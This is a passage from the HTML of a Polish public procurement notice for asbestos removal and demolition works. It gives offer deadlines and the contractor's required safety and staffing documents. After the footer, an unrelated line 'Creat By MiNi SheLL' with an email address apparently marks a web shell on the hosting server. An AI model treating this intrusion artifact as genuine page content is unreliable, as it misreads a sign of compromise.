lub wadliwym wykonaniem robót,<br/>5) konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych lub<br/>materiałowych ze względu na zmiany obowiązującego prawa. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kowr.eb2b.com.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-19 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Przed zawarciem umowy Wykonawca zobowiązany jest przedłożyć: a) oświadczenie o<br/>posiadaniu wyposażenia technicznego i socjalnego zapewniającego prowadzenie prac oraz<br/>zabezpieczeń pracowników i środowiska przed narażeniem na działanie azbestu,b) kserokopię<br/>potwierdzoną za zgodność z oryginałem zaświadczenia wystawionego przez uprawnioną<br/>instytucję o przeszkoleniu osób o których mowa w pkt 8.1.II.4aSWZ, w zakresie realizacji prac<br/>polegających na zabezpieczaniu i usuwaniu wyrobów zawierających azbest, bezpieczeństwa i<br/>higieny pracy przy zabezpieczaniu i usuwaniu tych wyrobów oraz przestrzegania procedur<br/>dotyczących bezpiecznego postępowania oraz kserokopię potwierdzoną za zgodność z<br/>oryginałem uprawnień do kierowania robotami budowlanymi o specjalności konstrukcyjno –<br/>budowlanej wraz z potwierdzeniem przynależności do Okręgowej Izby Inżynierów Budownictwa<br/>osoby, która pełnić będzie funkcję kierownika rozbiórki.c) Wykonawca zobowiązany jest na<br/>dzień podpisania umowy do przedstawienia Zamawiającemu wykazu pracowników<br/>zatrudnionych na podstawie umowy o pracę przez Wykonawcę lub Wykonawcę i<br/>Podwykonawcę, jeżeli ten<br/>wykonuje czynności określone w pkt 4.2 SWZ. Powyższe dokumenty Wykonawca składa w<br/>oryginale.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com